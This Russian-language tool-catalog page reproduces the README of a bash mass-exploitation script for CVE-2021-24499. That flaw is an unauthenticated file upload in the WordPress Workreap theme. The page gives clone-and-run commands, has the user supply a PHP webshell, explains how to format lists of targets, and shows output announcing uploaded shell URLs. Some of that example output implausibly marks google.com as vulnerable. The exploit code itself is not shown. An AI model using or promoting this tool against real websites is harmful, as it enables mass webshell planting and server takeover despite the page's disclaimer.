Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-24499 — Тема WordPress Workreap 2.2.2 - неаутентифицированная загрузка, приводящая к удалённому выполнению кода | Kitploit
Инструменты/GitHubGitHub/jayhutajulu1/cve-2021-24499
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubjayhutajulu1/cve-2021-24499

CVE-2021-24499

Тема WordPress Workreap 2.2.2 - неаутентифицированная загрузка, приводящая к удалённому выполнению кода

Репозиторий
17 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-24499 | Workreap — WordPress-тема Freelance Marketplace and Directory < 2.2.2 — Произвольная загрузка файлов

CVE License Shell

WordPress-тема Workreap 2.2.2 — Неаутентифицированная загрузка файлов, приводящая к удалённому выполнению кода

Мощный и точный инструмент массовой эксплуатации уязвимости CVE-2021-24499 в теме WordPress Workreap. Этот эксплойт позволяет неаутентифицированную загрузку файлов, что может привести к удалённому выполнению кода (RCE).

📝 Описание

CVE-2021-24499 — критическая уязвимость в теме WordPress Workreap (версии 2.2.2 и ниже), которая позволяет неаутентифицированным пользователям загружать произвольные файлы, включая PHP-файлы, через AJAX-действие workreap_award_temp_file_uploader. Это может привести к удалённому выполнению кода (RCE) на целевом сервере.

Уязвимые версии: все версии вплоть до 2.2.2 включительно

Оценка CVSS: критическая

📦 Требования

  • Оболочка Bash (Linux/macOS/WSL)
  • Утилита командной строки curl
  • Файл opts.php или shell.php (PHP-вебшелл)

🔧 Установка

  1. Клонируйте этот репозиторий:
root@kitploit:~
git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
  1. Сделайте скрипт исполняемым:
root@kitploit:~
chmod +x exploit.sh
  1. Убедитесь, что у вас есть opts.php или shell.php в той же директории (ваш PHP-вебшелл)

🚀 Использование

Базовое использование

Одиночная цель:

root@kitploit:~
./exploit.sh -u http://target.com

Несколько целей (из файла):

root@kitploit:~
./exploit.sh -l targets.txt

Показать справку:

root@kitploit:~
./exploit.sh --help

Параметры командной строки

OptionDescription
-u URLЭксплуатировать одну целевую URL
-l FILEЭксплуатировать несколько целей из файла (по одной URL в строке)
--helpПоказать меню справки

Формат файла с целями

Создайте текстовый файл с одной URL в строке:

root@kitploit:~
http://target1.com
https://target2.com
http://target3.com

📸 Примеры

Пример 1: эксплуатация одиночной цели

root@kitploit:~
$ ./exploit.sh -u https://domain.com

WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu

https://domain.com/ >> VULNERABLE! 
 --> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php

Пример 2: массовая эксплуатация

root@kitploit:~
$ ./exploit.sh -l targets.txt

WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu

https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!

⚠️ Отказ от ответственности

Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования.

  • НЕ используйте этот инструмент на системах, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения
  • НЕ используйте этот инструмент для любых незаконных действий
  • Авторы и участники не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом
  • Всегда убеждайтесь в наличии надлежащего разрешения перед тестированием любой системы
  • Используйте ответственно и этично

Используя этот инструмент, вы соглашаетесь использовать его только в законных целях тестирования безопасности и исследований.

🔗 Ссылки

  • Exploit-DB
  • Wordfence
  • WP-Scan

👤 Автор

Автор: Jay Maranatha Hutajulu

📄 Лицензия

Этот проект лицензируется под лицензией MIT — подробности см. в файле LICENSE.

🤝 Вклад

Приветствуются вклад, сообщения об ошибках и запросы новых функций! Загляните на страницу issues.

⭐ История звёзд

Если вы находите этот инструмент полезным, пожалуйста, подумайте о том, чтобы поставить ему звезду ⭐


Помните: всегда используйте инструменты безопасности ответственно и этично. Удачного взлома! 🚀

Скачать инструмент